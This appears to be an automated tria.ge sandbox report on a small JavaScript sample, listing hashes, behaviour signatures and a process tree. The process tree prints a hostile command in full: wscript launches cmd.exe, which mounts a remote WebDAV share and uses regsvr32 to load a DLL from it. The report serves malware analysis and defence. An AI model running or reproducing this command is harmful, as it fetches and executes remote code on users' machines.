Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
-
submitted
24/07/2024, 02:21
General
-
Target
19028118422498350.js
-
Size
5KB
-
MD5
790010d2de10be9efabde1b4f87cc2f4
-
SHA1
df5ff0c42bd4f6441f5265d1d64e5ad6aa59c143
-
SHA256
9eeef8fa997320dd8cdbe847e1bef8ae2a10709cc7ccb5585b7f429f83a1c28c
-
SHA512
c99912c06b5e24344d65a5b05f0a22a918a48e9bc74f4545d971e2fd6426f53dd98f647e89277af79e6ea89cd5f01b840ebb10cdadc62b3bb6dc82682226fe2d
-
SSDEEP
96:qrsxfjaTaYhdIKMW8wnuKG5zONAkbybONa:KsxfOeYhdIKMDwtG5zsAkbybsa
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\19028118422498350.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\114661144227600.dll2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵
-
-